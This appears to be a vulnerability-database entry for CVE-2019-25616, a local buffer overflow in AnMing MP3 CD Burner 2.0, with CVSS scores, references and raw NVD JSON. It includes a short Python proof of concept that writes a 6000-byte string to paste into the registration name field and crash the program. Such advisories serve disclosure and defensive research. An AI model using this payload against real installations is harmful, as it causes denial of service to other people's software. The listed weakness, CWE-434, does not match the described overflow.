CVE-2019-25616

Description

AnMing MP3 CD Burner 2.0 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an oversized string. Attackers can paste a 6000-byte payload into the registration name field to trigger a denial of service condition.

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

AnMing MP3 CD Burner 2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import sys

# PoC for CVE-2019-25616 - AnMing MP3 CD Burner Buffer Overflow

# Generate a payload of 6000 bytes to trigger the crash
def create_dos_payload():
    padding = b"A" * 6000
    
    try:
        with open("cve_2019_25616_payload.txt", "wb") as f:
            f.write(padding)
        print("[+] Payload file 'cve_2019_25616_payload.txt' created successfully.")
        print("[+] To exploit: Copy the content of the file and paste it into the 'Registration Name' field.")
    except IOError as e:
        print(f"[-] Error writing file: {e}")

if __name__ == "__main__":
    create_dos_payload()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25616
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25616
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25616/
[4] VulDB https://vuldb.com/cve/CVE-2019-25616
[5] http://www.ddz1977.com/
[6] https://files.downloadnow.com/s/software/10/56/16/74/anming_setup.zip?token=1556228877_063f2dc0aed064ee5d13374d8509661c&fileName=anming_setup.zip
[7] https://www.exploit-db.com/exploits/46754
[8] https://www.vulncheck.com/advisories/anming-mp3-cd-burner-local-denial-of-service

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25616", "sourceIdentifier": "[email protected]", "published": "2026-03-22T14:16:30.307", "lastModified": "2026-04-16T16:19:50.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "AnMing MP3 CD Burner 2.0 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an oversized string. Attackers can paste a 6000-byte payload into the registration name field to trigger a denial of service condition."}, {"lang": "es", "value": "AnMing MP3 CD Burner 2.0 contiene una vulnerabilidad de desbordamiento de búfer que permite a atacantes locales bloquear la aplicación al proporcionar una cadena de tamaño excesivo. Los atacantes pueden pegar una carga útil de 6000 bytes en el campo de nombre de registro para desencadenar una condición de denegación de servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "http://www.ddz1977.com/", "source": "[email protected]"}, {"url": "https://files.downloadnow.com/s/software/10/56/16/74/anming_setup.zip?token=1556228877_063f2dc0aed064ee5d13374d8509661c&fileName=anming_setup.zip", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46754", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/anming-mp3-cd-burner-local-denial-of-service", "source": "[email protected]"}]}}